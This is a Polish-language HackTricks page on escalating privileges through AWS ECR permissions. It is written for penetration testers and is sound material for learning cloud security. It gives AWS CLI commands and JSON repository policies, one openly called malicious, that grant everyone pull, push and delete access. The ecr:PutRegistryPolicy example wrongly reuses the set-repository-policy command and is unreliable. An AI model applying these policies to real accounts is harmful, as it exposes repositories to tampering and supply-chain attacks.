AWS - ECR Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

ECR

`ecr:GetAuthorizationToken`,`ecr:BatchGetImage`

Atakujący z uprawnieniami ecr:GetAuthorizationToken i ecr:BatchGetImage może zalogować się do ECR i pobrać obrazy.

Aby uzyskać więcej informacji na temat pobierania obrazów:

Potencjalny wpływ: Pośrednie podniesienie uprawnień poprzez przechwytywanie wrażliwych informacji w ruchu.

`ecr:GetAuthorizationToken`, `ecr:BatchCheckLayerAvailability`, `ecr:CompleteLayerUpload`, `ecr:InitiateLayerUpload`, `ecr:PutImage`, `ecr:UploadLayerPart`

Atakujący z wszystkimi tymi uprawnieniami może zalogować się do ECR i przesłać obrazy. Może to być przydatne do podniesienia uprawnień w innych środowiskach, w których te obrazy są używane.

Aby dowiedzieć się, jak przesłać nowy obraz/zaktualizować istniejący, sprawdź:

`ecr-public:GetAuthorizationToken`, `ecr-public:BatchCheckLayerAvailability, ecr-public:CompleteLayerUpload`, `ecr-public:InitiateLayerUpload, ecr-public:PutImage`, `ecr-public:UploadLayerPart`

Jak w poprzedniej sekcji, ale dla publicznych repozytoriów.

`ecr:SetRepositoryPolicy`

Atakujący z tym uprawnieniem mógłby zmienić politykę repozytorium, aby przyznać sobie (lub nawet wszystkim) dostęp do odczytu/zapisu. Na przykład, w tym przykładzie dostęp do odczytu jest przyznawany wszystkim.

aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json

Zawartość my-policy.json:

{
"Version" : "2008-10-17",
"Statement" : [
{
"Sid" : "allow public pull",
"Effect" : "Allow",
"Principal" : "*",
"Action" : [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer"
]
}
]
}

`ecr-public:SetRepositoryPolicy`

Jak w poprzedniej sekcji, ale dla publicznych repozytoriów. Atakujący może zmodyfikować politykę repozytorium publicznego repozytorium ECR, aby przyznać nieautoryzowany dostęp publiczny lub w celu eskalacji swoich uprawnień.

bashCopy code# Create a JSON file with the malicious public repository policy
echo '{
"Version": "2008-10-17",
"Statement": [
{
"Sid": "MaliciousPublicRepoPolicy",
"Effect": "Allow",
"Principal": "*",
"Action": [
"ecr-public:GetDownloadUrlForLayer",
"ecr-public:BatchGetImage",
"ecr-public:BatchCheckLayerAvailability",
"ecr-public:PutImage",
"ecr-public:InitiateLayerUpload",
"ecr-public:UploadLayerPart",
"ecr-public:CompleteLayerUpload",
"ecr-public:DeleteRepositoryPolicy"
]
}
]
}' > malicious_public_repo_policy.json

# Apply the malicious public repository policy to the ECR Public repository
aws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json

Potencjalny wpływ: Nieautoryzowany publiczny dostęp do repozytorium ECR Public, umożliwiający każdemu użytkownikowi przesyłanie, pobieranie lub usuwanie obrazów.

`ecr:PutRegistryPolicy`

Napastnik z tym uprawnieniem mógłby zmienić politykę rejestru, aby przyznać sobie, swojemu kontu (lub nawet wszystkim) dostęp do odczytu/zapisu.

aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json

Wsparcie HackTricks

Sprawdź plany subskrypcyjne!
Dołącz do 💬 grupy Discord lub grupy telegram lub śledź nas na Twitterze 🐦 @hacktricks_live.
Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów na githubie.

PreviousAWS - EC2 Privesc NextAWS - ECS Privesc

Last updated 3 days ago